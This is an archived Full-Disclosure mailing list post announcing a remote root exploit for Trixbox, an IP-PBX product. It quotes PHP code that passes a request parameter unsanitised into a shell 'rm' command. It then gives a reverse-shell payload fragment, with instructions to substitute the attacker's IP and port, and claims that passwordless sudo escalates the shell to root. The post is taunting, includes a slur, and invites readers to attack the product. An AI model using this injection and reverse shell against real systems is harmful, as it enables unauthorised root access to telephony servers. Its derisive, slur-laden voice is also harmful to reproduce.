lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 15 Mar 2014 09:13:26 +0200
From: 0u7 5m4r7 <>
 Exploit Arab <>
Subject: Trixbox all versions , Remote root Exploit

# App : Trixbox all versions
# vendor :
# Author : i-Hmx
# mail :
# Home : security arrays inc , ,

Well well well , we decided to give schmoozecom a break and have a look @
fonality products
do you think they have better product than the (Award winning) trixbox!!!
I don't think so
"Designed and marketed for Fonality's partner community, trixbox Pro is an
IP-PBX software solution purpose built to support growing SMB businesses.
A unique hybrid hosted telephony solution; trixbox Pro provides big
business features at an SMB cost . . blah blah blah"
What do we have here??
A 3 years old Sql injection flaw???
not big deal , and already been reported
not enough good exloitation , but reported
A file disclosure flaw???
save it for later
let's give Fonality little Remote root Exploit xD
and als give the pentesters some pain in the ass trying to exploit this
consider it as challenge ;)
Here we go
Vulnerable file :
Pice of $hit , sorry i mean code

switch($_action) {
    case 'Edit':
        if ($_REQUEST['newmac']){ // create a new phone from device map
            $mac_address = $_REQUEST['newmac'];
        if ($_REQUEST['mac']){
            $phoneinfo = GetPhone($_REQUEST['mac'],$PhoneType);
            $mac_address=$phoneinfo['mac_address'];    } // if there is a
request ID we Edit otherwise add a new phone

        $freepbx_device_list = GetFreepbxDeviceList();
        $smarty->assign("mac_address", $mac_address);
        $smarty->assign("phone", $phoneinfo);
        $smarty->assign("freepbx_device_list", $freepbx_device_list);

        $smarty->assign("message", $message);
        $template = "endpoint_".$PhoneType."_edit.tpl";

    case 'Delete':
        exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");
        getSQL("DELETE FROM ".$PhoneType." WHERE
        $smarty->assign("phones", ListPhones($PhoneType));
        $template = "endpoint_".$PhoneType."_list.tpl";

it's obvious we care about this line
>>>exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");<<<
Exploitation demo :
result will be written to xx
but this is not the full movie yet ,
Am here to give fonality an night mare , which take the form of "root"
actually the server is configured by default to allow the web interface
pages to edit many files @ the root directory
so any noob can easily execute the "sudo fu#k" with out being permited for
password , and the result is > root
<Back connection with root privs>
bash -i >%26 0>%261;faris
change to your ip and the port you are listening to
and , Volia , you are root
now am sure you're happy as pig in $hit xD
Still need more??
you will notice that you're unable to reach this file due to the http
but actually there is simple and yet dirty trick that allow you to get pass
through it , and execute your command smooooothely as boat on the river ;)
And here come the challengs , let's see what the faggots can do with this ;)
need hint???
use your mind and fu#k off :/

Big greets fly to the all sec4ever family
OH , and for voip lames , you can use our 0Days for sure
but once it become 720Days xD
Faris <the Awsome>

Content of type "text/html" skipped

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Powered by blists - more mailing lists